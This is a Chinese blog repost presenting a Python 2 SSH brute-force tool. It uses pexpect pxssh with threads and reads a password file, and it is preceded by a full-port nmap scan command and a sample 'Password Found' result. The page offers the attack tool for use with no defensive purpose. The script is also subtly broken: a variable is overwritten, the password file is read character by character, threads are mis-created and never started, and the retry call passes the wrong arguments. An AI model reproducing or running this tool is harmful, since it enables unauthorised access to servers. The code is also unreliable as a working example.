百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术资源 > 正文

服务器暴力破解的程序(python开发)

off999 2024-10-19 07:25 20 浏览 0 评论

如果您对服务器暴力破解和Python相关知识有兴趣,可以加群(526929231)与大神们共同探讨和

首先我们看一下基本的原理以及过程

Paste_Image.png

我们看一下准备工作:

我们需要获取目标机器的IP和SHH端口 ssh端口是可以改变的,所以我们需要去扫描机器的正确的ssh端口。我们使用nmap工具去扫描,使用下面这条命令就可以目标机器上面存在的所有的端口以及服务的名称和使用软件的版本号:

Bash
Nmap -v -p 1-65535 -sV -O -sS -T4 192.168.1.110(目标机器)

Paste_Image.png

大家可以看到我们的ssh端口是我们的12784。ssh版本是5.3

现在我们以及获取到我们需要的信息了 IP:192.168.1.110 PORT:12784

我们可以开始破解了。

Paste_Image.png

大家可以看到password Found: vagrant这个就是我们的目标机器的密码:

Bash
#python pexpect pxssh远程登录 login()方法可以帮助我们去登录目标机器
from pexpect import pxssh
import optparse #处理我们命令行参数的模块
from threading import * #多线程 高并发 可以同时登录多个密码
import time
maxConnections = 5 #执行最大线程数 可以修改
#把maxConnection绑定到我们BoundedSemaphore方法 赋值给connection对象
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False #设置一个初始化值 false后面会用到
Failes = 0 #设置一个初始化值为0
def connect(host, user, password, ports, release): #传了5个变量进去
 global Found
 global Failes
 try:
 s = pxssh.pxssh() #把方法绑定到对象s 方便调用
 s.login(host,user,password,ports) #调用我们的pxssh.login方法并把参数传进去
 print '[+] Password Found:' +password #打印匹配到的密码
 Found = True #如果等于true就结束
 except Exception, e:
 if 'read_nonblocking' in str(e): #这个字符串表示主机连接次数过多,ssh不对外提供服务
 Failes += 1
 time.sleep(5) #休息5秒
 connect(host,user,password,False) #重新调用connect函数
 finally:
 if release:
 connection_lock.release()
def main():
 parser = optparse.OptionParser("usage%prog -H <target host> -u <user> -F <passwordfile> -P <port>")
 #创建一个对象parser绑定一个帮助信息 自动生成
 parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
 parser.add_option('-u', dest='user', type='string', help='specify target user')
 parser.add_option('-F', dest='passwdFile', type='string', help='specify target password file')
 parser.add_option('-P', dest='ports', type='string', help='specify target ports')
 #当我们输入-p之后会把参数赋值给ports
 (options, args)=parser.parse_args()
 host = options.tgtHost
 user = options.user
 passwdFiles = options.passwdFile
 host = options.passwdFile
 ports = options.ports
 if (host==None) | (user==None) | (passwdFiles==None) | (ports==None):
 #判断获取的值是否为空,如果有一个为空就打印帮助信息
 print parser.usage #打印帮助信息
 exit()
 fn = open(passwdFiles,'r') #使用open方法打开文件并绑定到fn这个对象
 for line in fn.readline():
 if Found:
 print "[*] exiting: password Found"
 exit()
 if Failes > 5:
 print "[!]exiting: Too many socket timeouts"
 exit()
 connection_lock.acquire() #锁定
 password = line.strip('\r\n')
 print "[-] Testing: " +str(password)
 t = Thread(target = connect(), args=(host, user, password, ports, True))
 #启动多线程,并传入方法connet函数 args是函数的参数
if __name__ == '__main__':
 main()

作者:IT蔷薇

著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

相关推荐

面试官:来,讲一下枚举类型在开发时中实际应用场景!

一.基本介绍枚举是JDK1.5新增的数据类型,使用枚举我们可以很好的描述一些特定的业务场景,比如一年中的春、夏、秋、冬,还有每周的周一到周天,还有各种颜色,以及可以用它来描述一些状态信息,比如错...

一日一技:11个基本Python技巧和窍门

1.两个数字的交换.x,y=10,20print(x,y)x,y=y,xprint(x,y)输出:102020102.Python字符串取反a="Ge...

Python Enum 技巧,让代码更简洁、更安全、更易维护

如果你是一名Python开发人员,你很可能使用过enum.Enum来创建可读性和可维护性代码。今天发现一个强大的技巧,可以让Enum的境界更进一层,这个技巧不仅能提高可读性,还能以最小的代价增...

Python元组编程指导教程(python元组的概念)

1.元组基础概念1.1什么是元组元组(Tuple)是Python中一种不可变的序列类型,用于存储多个有序的元素。元组与列表(list)类似,但元组一旦创建就不能修改(不可变),这使得元组在某些场景...

你可能不知道的实用 Python 功能(python有哪些用)

1.超越文件处理的内容管理器大多数开发人员都熟悉使用with语句进行文件操作:withopen('file.txt','r')asfile:co...

Python 2至3.13新特性总结(python 3.10新特性)

以下是Python2到Python3.13的主要新特性总结,按版本分类整理:Python2到Python3的重大变化Python3是一个不向后兼容的版本,主要改进包括:pri...

Python中for循环访问索引值的方法

技术背景在Python编程中,我们经常需要在循环中访问元素的索引值。例如,在处理列表、元组等可迭代对象时,除了要获取元素本身,还需要知道元素的位置。Python提供了多种方式来实现这一需求,下面将详细...

Python enumerate核心应用解析:索引遍历的高效实践方案

喜欢的条友记得关注、点赞、转发、收藏,你们的支持就是我最大的动力源泉。根据GitHub代码分析统计,使用enumerate替代range(len())写法可减少38%的索引错误概率。本文通过12个生产...

Python入门到脱坑经典案例—列表去重

列表去重是Python编程中常见的操作,下面我将介绍多种实现列表去重的方法,从基础到进阶,帮助初学者全面掌握这一技能。方法一:使用集合(set)去重(最简单)pythondefremove_dupl...

Python枚举类工程实践:常量管理的标准化解决方案

本文通过7个生产案例,系统解析枚举类在工程实践中的应用,覆盖状态管理、配置选项、错误代码等场景,适用于Web服务开发、自动化测试及系统集成领域。一、基础概念与语法演进1.1传统常量与枚举类对比#传...

让Python枚举更强大!教你玩转Enum扩展

为什么你需要关注Enum?在日常开发中,你是否经常遇到这样的代码?ifstatus==1:print("开始处理")elifstatus==2:pri...

Python枚举(Enum)技巧,你值得了解

枚举(Enum)提供了更清晰、结构化的方式来定义常量。通过为枚举添加行为、自动分配值和存储额外数据,可以提升代码的可读性、可维护性,并与数据库结合使用时,使用字符串代替数字能简化调试和查询。Pytho...

78行Python代码帮你复现微信撤回消息!

来源:悟空智能科技本文约700字,建议阅读5分钟。本文基于python的微信开源库itchat,教你如何收集私聊撤回的信息。[导读]Python曾经对我说:"时日不多,赶紧用Python"。于是看...

登录人人都是产品经理即可获得以下权益

文章介绍如何利用Cursor自动开发Playwright网页自动化脚本,实现从选题、写文、生图的全流程自动化,并将其打包成API供工作流调用,提高工作效率。虽然我前面文章介绍了很多AI工作流,但它们...

Python常用小知识-第二弹(python常用方法总结)

一、Python中使用JsonPath提取字典中的值JsonPath是解析Json字符串用的,如果有一个多层嵌套的复杂字典,想要根据key和下标来批量提取value,这是比较困难的,使用jsonpat...

取消回复欢迎 发表评论: